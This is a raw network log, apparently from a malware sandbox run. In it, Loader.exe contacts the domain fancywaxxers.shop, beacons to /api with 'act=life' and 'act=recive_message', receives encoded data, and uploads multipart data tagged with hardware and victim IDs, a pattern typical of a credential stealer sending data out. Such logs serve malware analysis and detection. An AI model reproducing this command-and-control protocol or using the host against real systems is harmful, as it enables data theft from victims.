                                                                                                Jan 1, 2025 02:56:55.706455946 CET192.168.2.41.1.1.10x78e1Standard query (0)fancywaxxers.shopA (IP address)IN (0x0001)false
                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                Jan 1, 2025 02:56:55.718822002 CET1.1.1.1192.168.2.40x78e1No error (0)fancywaxxers.shop104.21.48.1A (IP address)IN (0x0001)false
                                                                                                Jan 1, 2025 02:56:55.718822002 CET1.1.1.1192.168.2.40x78e1No error (0)fancywaxxers.shop104.21.32.1A (IP address)IN (0x0001)false
                                                                                                Jan 1, 2025 02:56:55.718822002 CET1.1.1.1192.168.2.40x78e1No error (0)fancywaxxers.shop104.21.64.1A (IP address)IN (0x0001)false
                                                                                                Jan 1, 2025 02:56:55.718822002 CET1.1.1.1192.168.2.40x78e1No error (0)fancywaxxers.shop104.21.16.1A (IP address)IN (0x0001)false
                                                                                                Jan 1, 2025 02:56:55.718822002 CET1.1.1.1192.168.2.40x78e1No error (0)fancywaxxers.shop104.21.112.1A (IP address)IN (0x0001)false
                                                                                                Jan 1, 2025 02:56:55.718822002 CET1.1.1.1192.168.2.40x78e1No error (0)fancywaxxers.shop104.21.96.1A (IP address)IN (0x0001)false
                                                                                                Jan 1, 2025 02:56:55.718822002 CET1.1.1.1192.168.2.40x78e1No error (0)fancywaxxers.shop104.21.80.1A (IP address)IN (0x0001)false
                                                                                                • fancywaxxers.shop
                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                0192.168.2.449730104.21.48.14432588C:\Users\user\Desktop\Loader.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2025-01-01 01:56:56 UTC264OUTPOST /api HTTP/1.1
                                                                                                Connection: Keep-Alive
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                Content-Length: 8
                                                                                                Host: fancywaxxers.shop
                                                                                                2025-01-01 01:56:56 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                Data Ascii: act=life
                                                                                                2025-01-01 01:56:56 UTC1131INHTTP/1.1 200 OK
                                                                                                Date: Wed, 01 Jan 2025 01:56:56 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Set-Cookie: PHPSESSID=1rc1vt13moqgi6g80fabl6n9l7; expires=Sat, 26 Apr 2025 19:43:35 GMT; Max-Age=9999999; path=/
                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                Pragma: no-cache
                                                                                                X-Frame-Options: DENY
                                                                                                X-Content-Type-Options: nosniff
                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                cf-cache-status: DYNAMIC
                                                                                                vary: accept-encoding
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KIR9xXx5YKRlV9DbHNWEKEozLZGFnO7uP9dmy2lbves9V5fOlilyW8rHTxE7I%2BQ%2FKXpkT%2FygTcyeVFfro9r4Vpa147tv6W9qDgmLge%2F8qciSXjOY9KD9FSoyk1gvF8PHrkDi0Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8faee54bd80143be-EWR
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1584&min_rtt=1576&rtt_var=608&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2842&recv_bytes=908&delivery_rate=1772920&cwnd=226&unsent_bytes=0&cid=bb90f9aeb0effe6d&ts=767&x=0"
                                                                                                2025-01-01 01:56:56 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                Data Ascii: 2ok
                                                                                                2025-01-01 01:56:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                1192.168.2.449731104.21.48.14432588C:\Users\user\Desktop\Loader.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2025-01-01 01:56:57 UTC265OUTPOST /api HTTP/1.1
                                                                                                Connection: Keep-Alive
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                Content-Length: 52
                                                                                                Host: fancywaxxers.shop
                                                                                                2025-01-01 01:56:57 UTC52OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 61 75 36 4e 61 2d 2d 36 35 32 34 37 39 35 30 39 34 26 6a 3d
                                                                                                Data Ascii: act=recive_message&ver=4.0&lid=yau6Na--6524795094&j=
                                                                                                2025-01-01 01:56:57 UTC1131INHTTP/1.1 200 OK
                                                                                                Date: Wed, 01 Jan 2025 01:56:57 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Set-Cookie: PHPSESSID=jp22pdhu9fv9rqceg2qr5j1ibf; expires=Sat, 26 Apr 2025 19:43:36 GMT; Max-Age=9999999; path=/
                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                Pragma: no-cache
                                                                                                X-Frame-Options: DENY
                                                                                                X-Content-Type-Options: nosniff
                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                cf-cache-status: DYNAMIC
                                                                                                vary: accept-encoding
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Zk48mM4dBoJLSrn0772QWC5p6MrTNkac%2B2VxStR4VVZZlAIcuVd4QygeyX7AnA%2BV4aIGo8f46LmRatLVTAQLeGCTgyTIyoaUMVmy%2F6Pp4sSOooOHaGwjvoyQ%2B385CIF0xZSxGg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8faee5535f708c15-EWR
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1798&min_rtt=1789&rtt_var=689&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2842&recv_bytes=953&delivery_rate=1567364&cwnd=238&unsent_bytes=0&cid=dfd301fc9ed53a47&ts=479&x=0"
                                                                                                2025-01-01 01:56:57 UTC238INData Raw: 34 36 65 0d 0a 33 53 44 58 64 33 51 7a 2b 6a 35 30 77 39 65 72 65 35 6c 30 53 6f 57 72 63 34 42 32 43 34 32 6e 36 42 61 4c 70 63 42 4b 37 71 32 6d 41 71 46 56 54 67 66 57 48 41 65 6d 39 5a 45 50 36 77 45 76 71 59 6b 53 35 46 51 78 36 38 61 45 5a 65 36 4a 34 6a 79 44 6a 2b 64 47 74 68 73 48 56 74 59 63 45 62 76 31 6b 53 44 69 56 69 2f 72 69 55 6d 69 45 32 48 76 78 6f 52 30 36 73 36 76 4f 6f 4c 4f 74 55 79 77 48 78 46 51 6e 6c 38 59 72 72 4c 4f 48 76 67 65 4a 4f 7a 47 47 2b 31 55 4a 36 2f 43 6b 6a 53 78 68 34 30 76 6d 73 79 51 51 61 51 63 56 6b 37 57 52 56 61 6d 75 59 6c 42 75 78 55 76 35 38 63 56 35 42 31 6a 35 63 2b 4d 64 65 2f 50 73 43 4f 49 78 62 56 43 73 78 34 62 57 59 70 53 45 71 6d 35 79 42 54 34 56
                                                                                                Data Ascii: 46e3SDXd3Qz+j50w9ere5l0SoWrc4B2C42n6BaLpcBK7q2mAqFVTgfWHAem9ZEP6wEvqYkS5FQx68aEZe6J4jyDj+dGthsHVtYcEbv1kSDiVi/riUmiE2HvxoR06s6vOoLOtUywHxFQnl8YrrLOHvgeJOzGG+1UJ6/CkjSxh40vmsyQQaQcVk7WRVamuYlBuxUv58cV5B1j5c+Mde/PsCOIxbVCsx4bWYpSEqm5yBT4V
                                                                                                2025-01-01 01:56:57 UTC903INData Raw: 6d 61 6e 7a 67 6d 69 54 43 6d 38 39 34 6c 6c 2b 4e 4b 76 4f 49 71 50 6f 41 79 73 56 52 46 64 32 41 52 57 71 62 6e 48 48 50 67 5a 4c 2b 62 4a 41 2b 30 55 61 75 66 4e 6a 6e 37 6d 79 4b 30 6d 68 73 69 33 53 37 49 61 45 56 6d 65 55 78 58 68 2b 34 6b 65 34 31 5a 77 70 2b 6b 42 34 52 64 39 34 74 54 4b 61 36 66 65 34 69 2b 41 6a 2b 63 43 73 78 73 58 58 4a 68 4f 48 71 71 2b 7a 41 76 77 48 79 58 71 79 52 7a 6f 47 32 72 76 77 6f 42 2b 35 73 32 6d 4a 59 48 4a 76 30 4c 31 57 31 5a 57 67 42 78 4f 34 5a 62 4d 43 66 77 61 50 71 58 7a 55 66 31 61 63 4b 2f 43 68 6a 53 78 68 36 6f 74 6a 38 79 30 54 62 59 64 48 55 4f 59 54 68 43 73 73 4e 73 66 2f 68 67 69 35 4e 73 62 37 42 4a 71 35 73 36 44 63 65 37 44 34 6d 62 4d 79 4b 63 43 37 56 55 33 58 4a 4e 51 48 4c 61 31 69 51 61 31
                                                                                                Data Ascii: manzgmiTCm894ll+NKvOIqPoAysVRFd2ARWqbnHHPgZL+bJA+0UaufNjn7myK0mhsi3S7IaEVmeUxXh+4ke41Zwp+kB4Rd94tTKa6fe4i+Aj+cCsxsXXJhOHqq+zAvwHyXqyRzoG2rvwoB+5s2mJYHJv0L1W1ZWgBxO4ZbMCfwaPqXzUf1acK/ChjSxh6otj8y0TbYdHUOYThCssNsf/hgi5Nsb7BJq5s6Dce7D4mbMyKcC7VU3XJNQHLa1iQa1
                                                                                                2025-01-01 01:56:57 UTC1369INData Raw: 34 35 32 36 0d 0a 62 30 56 48 61 68 33 4d 70 7a 35 59 66 36 61 49 50 41 73 45 71 31 46 42 4a 63 6e 46 30 62 72 62 7a 4b 46 66 63 65 4a 65 76 4e 48 75 6f 63 61 75 66 58 68 48 72 76 77 61 49 74 7a 49 48 2f 52 61 31 56 54 68 47 38 55 67 47 31 76 6f 73 73 2b 42 67 6d 34 4e 39 52 2f 56 70 77 72 38 4b 47 4e 4c 47 48 72 43 57 48 77 37 68 4c 74 42 59 57 57 35 5a 54 48 4b 6d 39 79 52 54 36 48 53 44 68 78 42 72 74 47 32 37 6e 78 6f 5a 78 35 4d 54 69 5a 73 7a 49 70 77 4c 74 56 54 4e 66 6d 30 30 48 34 34 44 4b 46 2f 55 52 50 71 66 57 58 2f 74 55 62 75 4f 46 30 6a 54 6a 77 4b 55 73 67 63 57 38 52 72 45 59 47 56 69 52 56 51 53 72 75 63 63 4c 39 68 77 74 36 63 55 55 37 52 52 6f 37 73 75 41 66 36 6d 4a 34 69 2b 55 6a 2b 63 43 6d 68 67 47 51 35 4a 58 42 2b 4f 41 79 68 66
                                                                                                Data Ascii: 4526b0VHah3Mpz5Yf6aIPAsEq1FBJcnF0brbzKFfceJevNHuocaufXhHrvwaItzIH/Ra1VThG8UgG1voss+Bgm4N9R/Vpwr8KGNLGHrCWHw7hLtBYWW5ZTHKm9yRT6HSDhxBrtG27nxoZx5MTiZszIpwLtVTNfm00H44DKF/URPqfWX/tUbuOF0jTjwKUsgcW8RrEYGViRVQSruccL9hwt6cUU7RRo7suAf6mJ4i+Uj+cCmhgGQ5JXB+OAyhf
                                                                                                2025-01-01 01:56:57 UTC1369INData Raw: 2b 59 53 39 42 34 70 38 49 75 54 4e 4f 37 4c 34 6e 44 4d 78 62 4e 47 74 68 6b 66 58 5a 56 64 45 71 61 34 7a 52 6e 39 45 43 33 6d 77 68 6e 75 47 32 50 6a 77 59 5a 39 37 38 75 68 4b 34 71 50 38 51 4b 79 44 56 59 4a 32 48 30 62 71 72 6e 4a 47 75 6f 52 61 4b 6d 4a 48 2b 51 55 4b 62 66 54 6d 6d 50 75 32 4f 77 78 7a 4d 69 7a 41 75 31 56 48 45 4f 64 55 68 4b 72 73 4d 30 56 38 52 59 74 39 63 45 58 35 52 68 68 36 73 71 4d 63 65 54 41 71 53 75 65 33 62 78 47 75 78 6c 57 48 39 68 62 44 75 48 74 69 54 7a 73 46 54 6a 68 79 6c 48 39 57 6e 43 76 77 6f 59 30 73 59 65 69 4a 6f 44 45 75 45 6d 2b 45 52 4a 52 6c 56 63 59 72 37 7a 46 45 66 63 52 4f 75 72 4d 47 65 67 64 62 4f 50 49 69 57 62 71 78 75 4a 6d 7a 4d 69 6e 41 75 31 56 4d 57 4b 76 66 31 61 2b 2b 39 42 5a 2f 42 70 6f
                                                                                                Data Ascii: +YS9B4p8IuTNO7L4nDMxbNGthkfXZVdEqa4zRn9EC3mwhnuG2PjwYZ978uhK4qP8QKyDVYJ2H0bqrnJGuoRaKmJH+QUKbfTmmPu2OwxzMizAu1VHEOdUhKrsM0V8RYt9cEX5Rhh6sqMceTAqSue3bxGuxlWH9hbDuHtiTzsFTjhylH9WnCvwoY0sYeiJoDEuEm+ERJRlVcYr7zFEfcROurMGegdbOPIiWbqxuJmzMinAu1VMWKvf1a++9BZ/Bpo
                                                                                                2025-01-01 01:56:57 UTC1369INData Raw: 45 62 59 71 2f 61 78 47 32 70 77 4b 35 6f 31 49 2b 34 53 72 30 62 46 56 65 54 55 42 71 67 76 4d 38 63 38 78 45 6e 34 4d 41 57 34 68 4a 37 36 4d 69 44 64 4f 4c 4f 71 43 79 4e 78 50 38 4d 39 52 49 4f 45 63 41 63 4a 4b 61 6a 32 52 71 37 43 57 62 2b 69 52 62 75 56 44 47 76 79 4a 68 31 37 4e 57 6d 4a 34 66 64 74 45 53 31 45 41 52 57 6c 46 59 5a 6f 72 33 45 47 76 4d 45 4b 4f 72 4a 41 2f 41 53 59 75 47 46 78 44 54 75 33 2b 4a 77 7a 50 36 6f 53 66 55 4b 57 45 6a 59 57 78 72 68 37 59 6b 61 38 52 73 6d 39 63 30 58 36 52 64 6e 35 38 43 43 63 4f 50 4b 72 53 4f 47 78 72 64 43 75 68 41 65 57 70 35 53 46 36 65 35 78 46 6d 31 56 69 2f 2f 69 55 6d 69 4d 33 50 69 77 35 31 6c 33 4d 43 69 65 63 7a 51 38 56 76 31 45 68 6f 52 77 42 77 62 72 62 2f 45 48 50 38 65 4c 2b 54 49 48
                                                                                                Data Ascii: EbYq/axG2pwK5o1I+4Sr0bFVeTUBqgvM8c8xEn4MAW4hJ76MiDdOLOqCyNxP8M9RIOEcAcJKaj2Rq7CWb+iRbuVDGvyJh17NWmJ4fdtES1EARWlFYZor3EGvMEKOrJA/ASYuGFxDTu3+JwzP6oSfUKWEjYWxrh7Yka8Rsm9c0X6Rdn58CCcOPKrSOGxrdCuhAeWp5SF6e5xFm1Vi//iUmiM3Piw51l3MCieczQ8Vv1EhoRwBwbrb/EHP8eL+TIH
                                                                                                2025-01-01 01:56:57 UTC1369INData Raw: 6a 68 64 49 30 35 38 71 6b 4b 59 33 48 74 30 4b 7a 48 78 4a 53 6b 56 38 52 71 4c 50 43 47 76 45 5a 4c 2b 48 4e 45 65 6b 54 5a 2b 6e 41 67 58 32 70 69 65 49 76 6c 49 2f 6e 41 70 4d 32 42 45 4f 71 55 68 57 36 39 64 5a 58 34 6c 59 76 36 34 6c 4a 6f 68 39 68 34 4e 65 50 66 65 48 44 71 79 69 49 78 62 4a 46 74 52 41 62 56 4a 78 53 45 71 61 31 78 52 62 38 48 69 66 6a 79 52 36 69 57 69 6e 6f 33 63 6f 73 71 65 65 70 50 71 33 42 74 46 44 31 43 6c 68 49 32 46 73 61 34 65 32 4a 46 2f 49 58 49 4f 6e 46 47 65 59 47 61 65 54 4d 68 58 58 6d 78 36 45 70 68 73 65 74 52 4c 55 65 48 6c 61 51 57 42 69 7a 74 4d 5a 5a 74 56 59 76 2f 34 6c 4a 6f 69 56 2f 36 4d 4b 46 4e 73 44 41 75 53 6d 47 7a 4c 52 4f 39 51 70 59 53 4e 68 62 47 75 48 74 69 52 54 33 47 79 7a 31 78 52 48 69 48 57
                                                                                                Data Ascii: jhdI058qkKY3Ht0KzHxJSkV8RqLPCGvEZL+HNEekTZ+nAgX2pieIvlI/nApM2BEOqUhW69dZX4lYv64lJoh9h4NePfeHDqyiIxbJFtRAbVJxSEqa1xRb8HifjyR6iWino3cosqeepPq3BtFD1ClhI2Fsa4e2JF/IXIOnFGeYGaeTMhXXmx6EphsetRLUeHlaQWBiztMZZtVYv/4lJoiV/6MKFNsDAuSmGzLRO9QpYSNhbGuHtiRT3Gyz1xRHiHW
                                                                                                2025-01-01 01:56:57 UTC1369INData Raw: 65 75 7a 47 72 69 4b 4c 77 61 31 44 76 78 6b 58 56 70 39 58 42 4b 71 6e 77 68 48 34 47 43 44 75 79 52 2f 69 46 57 54 76 68 63 51 30 37 74 2f 69 63 4d 7a 71 6e 46 57 6a 48 31 52 79 6a 30 6f 63 70 72 6e 66 45 76 6f 56 50 75 72 5a 55 61 78 55 65 4f 6a 55 79 69 7a 2f 31 37 55 76 6b 34 47 6d 41 72 49 5a 56 67 6e 59 56 78 6d 76 75 4d 49 64 38 68 4d 67 35 4d 77 55 36 42 68 6c 37 73 32 44 66 75 7a 43 70 43 4b 50 77 62 42 44 75 52 45 66 58 35 45 63 57 4f 47 79 30 56 6d 6a 56 68 37 33 7a 67 6e 76 42 43 76 64 78 70 74 6c 2f 4d 71 79 4c 73 37 67 76 45 36 32 45 42 46 42 32 45 4e 59 75 50 58 4f 46 62 74 4f 61 4f 66 4e 48 65 45 54 5a 2b 44 49 68 58 50 69 79 4b 67 6d 6e 73 43 36 53 72 6b 64 47 30 4f 53 56 67 53 6f 76 4d 51 58 38 77 51 72 70 34 64 52 35 51 77 70 74 34 57
                                                                                                Data Ascii: euzGriKLwa1DvxkXVp9XBKqnwhH4GCDuyR/iFWTvhcQ07t/icMzqnFWjH1Ryj0ocprnfEvoVPurZUaxUeOjUyiz/17Uvk4GmArIZVgnYVxmvuMId8hMg5MwU6Bhl7s2DfuzCpCKPwbBDuREfX5EcWOGy0VmjVh73zgnvBCvdxptl/MqyLs7gvE62EBFB2ENYuPXOFbtOaOfNHeETZ+DIhXPiyKgmnsC6SrkdG0OSVgSovMQX8wQrp4dR5Qwpt4W
                                                                                                2025-01-01 01:56:57 UTC1369INData Raw: 35 31 6d 7a 4e 66 2f 47 76 55 67 46 56 2b 57 57 77 43 77 2b 4f 67 55 38 42 6f 6c 36 4d 4a 52 72 46 52 76 72 35 33 61 4f 71 6e 44 73 32 6a 55 6e 2b 30 5a 34 45 5a 42 41 63 70 44 57 4c 6a 31 33 31 6d 6a 52 47 61 6e 32 31 47 36 56 43 37 73 31 35 68 79 36 74 47 68 62 37 4c 78 6e 46 57 6a 48 77 30 54 76 6c 73 48 71 4b 50 45 43 38 55 6f 42 75 72 49 45 75 78 57 57 50 6e 49 6d 6e 66 73 77 4a 77 57 67 73 69 72 52 62 73 54 46 68 48 57 48 42 6e 68 37 66 42 5a 73 31 59 58 71 59 6b 4a 6f 6b 77 70 32 73 61 45 65 75 37 52 73 32 57 76 32 4b 6c 49 72 6c 63 77 56 6f 6c 56 41 4b 79 6e 69 56 65 37 45 47 69 2f 6d 56 2b 69 45 48 69 76 6e 64 6f 6d 73 70 4c 78 66 39 79 64 6f 41 79 73 56 51 41 52 77 41 35 59 34 61 65 4a 51 62 74 52 4b 2f 58 62 46 2b 45 43 61 71 6a 37 74 46 54 69
                                                                                                Data Ascii: 51mzNf/GvUgFV+WWwCw+OgU8Bol6MJRrFRvr53aOqnDs2jUn+0Z4EZBAcpDWLj131mjRGan21G6VC7s15hy6tGhb7LxnFWjHw0TvlsHqKPEC8UoBurIEuxWWPnImnfswJwWgsirRbsTFhHWHBnh7fBZs1YXqYkJokwp2saEeu7Rs2Wv2KlIrlcwVolVAKyniVe7EGi/mV+iEHivndomspLxf9ydoAysVQARwA5Y4aeJQbtRK/XbF+ECaqj7tFTi
                                                                                                2025-01-01 01:56:57 UTC1369INData Raw: 79 64 35 42 66 6d 51 6b 59 44 68 78 49 50 34 61 4f 4a 51 61 6c 59 61 50 57 4a 53 61 4a 54 61 76 33 58 6a 48 66 2f 78 4f 55 57 73 76 71 38 54 4c 73 53 41 47 53 62 54 52 57 68 76 76 63 6e 32 68 67 6a 34 4d 55 48 33 43 70 63 37 4d 75 45 63 2f 2f 57 34 6d 62 4d 77 50 38 61 6a 46 56 65 45 61 63 53 56 72 6e 31 6b 56 6e 4f 46 53 62 70 7a 67 66 7a 57 56 7a 73 31 49 6c 30 34 6f 66 73 61 49 71 50 35 78 44 37 56 52 4a 41 32 41 52 47 38 2b 36 63 53 71 78 47 65 76 69 48 43 4b 49 43 4b 62 65 58 78 44 54 37 68 2f 70 6f 79 38 79 74 55 4c 4d 57 41 46 4c 66 59 69 69 48 74 73 34 66 2b 42 67 2f 39 6f 73 2b 34 52 39 6c 34 38 4b 63 53 74 66 53 6f 53 61 43 79 4b 6c 54 39 56 74 57 58 74 67 45 4c 2b 47 6b 77 78 36 33 58 6d 54 32 32 68 2f 70 41 6d 36 76 2b 73 51 30 38 59 66 36 61
                                                                                                Data Ascii: yd5BfmQkYDhxIP4aOJQalYaPWJSaJTav3XjHf/xOUWsvq8TLsSAGSbTRWhvvcn2hgj4MUH3Cpc7MuEc//W4mbMwP8ajFVeEacSVrn1kVnOFSbpzgfzWVzs1Il04ofsaIqP5xD7VRJA2ARG8+6cSqxGeviHCKICKbeXxDT7h/poy8ytULMWAFLfYiiHts4f+Bg/9os+4R9l48KcStfSoSaCyKlT9VtWXtgEL+Gkwx63XmT22h/pAm6v+sQ08Yf6a


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                2192.168.2.449732104.21.48.14432588C:\Users\user\Desktop\Loader.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2025-01-01 01:56:58 UTC275OUTPOST /api HTTP/1.1
                                                                                                Connection: Keep-Alive
                                                                                                Content-Type: multipart/form-data; boundary=0N84MEPGBS
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                Content-Length: 18120
                                                                                                Host: fancywaxxers.shop
                                                                                                2025-01-01 01:56:58 UTC15331OUTData Raw: 2d 2d 30 4e 38 34 4d 45 50 47 42 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 31 30 36 44 37 30 32 30 45 45 32 30 35 35 35 45 31 42 37 31 39 38 32 41 31 30 42 36 34 36 41 0d 0a 2d 2d 30 4e 38 34 4d 45 50 47 42 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 30 4e 38 34 4d 45 50 47 42 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 36 35 32 34 37 39 35 30 39 34 0d 0a 2d 2d 30 4e 38 34 4d 45 50 47 42 53 0d 0a 43 6f 6e
                                                                                                Data Ascii: --0N84MEPGBSContent-Disposition: form-data; name="hwid"2106D7020EE20555E1B71982A10B646A--0N84MEPGBSContent-Disposition: form-data; name="pid"2--0N84MEPGBSContent-Disposition: form-data; name="lid"yau6Na--6524795094--0N84MEPGBSCon
                                                                                                2025-01-01 01:56:58 UTC2789OUTData Raw: 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88 8d cc 54 77 94 6d 93 be 93 15 d7 52
                                                                                                Data Ascii: f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECaTwmR
                                                                                                2025-01-01 01:56:59 UTC1143INHTTP/1.1 200 OK
                                                                                                Date: Wed, 01 Jan 2025 01:56:59 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Set-Cookie: PHPSESSID=2oitio6aahq83vm6qhhj7o8etc; expires=Sat, 26 Apr 2025 19:43:38 GMT; Max-Age=9999999; path=/
                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                Pragma: no-cache
                                                                                                X-Frame-Options: DENY
                                                                                                X-Content-Type-Options: nosniff
                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                cf-cache-status: DYNAMIC
                                                                                                vary: accept-encoding
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=al78%2FRZzJE3TLxt2DA%2BzVSy9qvCVk0kPuKo9OTqIcrTQo%2BpPQKrA3nVulMlzJpyIALJ6qWsr%2Fbzcri2xuAl8rVFnfVZktJQYEb%2BW80ALvE%2FFi56joEvc%2FbYzcuPi0%2FMGqcOTPg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8faee55b5c98c323-EWR
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1481&min_rtt=1474&rtt_var=568&sent=10&recv=23&lost=0&retrans=0&sent_bytes=2843&recv_bytes=19075&delivery_rate=1902280&cwnd=214&unsent_bytes=0&cid=19e50ddb760f9b83&ts=666&x=0"
                                                                                                2025-01-01 01:56:59 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                Data Ascii: fok 8.46.123.189
                                                                                                2025-01-01 01:56:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                3192.168.2.449733104.21.48.14432588C:\Users\user\Desktop\Loader.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2025-01-01 01:56:59 UTC274OUTPOST /api HTTP/1.1
                                                                                                Connection: Keep-Alive
                                                                                                Content-Type: multipart/form-data; boundary=OG750WXNTG
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                Content-Length: 8741
                                                                                                Host: fancywaxxers.shop
                                                                                                2025-01-01 01:56:59 UTC8741OUTData Raw: 2d 2d 4f 47 37 35 30 57 58 4e 54 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 31 30 36 44 37 30 32 30 45 45 32 30 35 35 35 45 31 42 37 31 39 38 32 41 31 30 42 36 34 36 41 0d 0a 2d 2d 4f 47 37 35 30 57 58 4e 54 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4f 47 37 35 30 57 58 4e 54 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 36 35 32 34 37 39 35 30 39 34 0d 0a 2d 2d 4f 47 37 35 30 57 58 4e 54 47 0d 0a 43 6f 6e
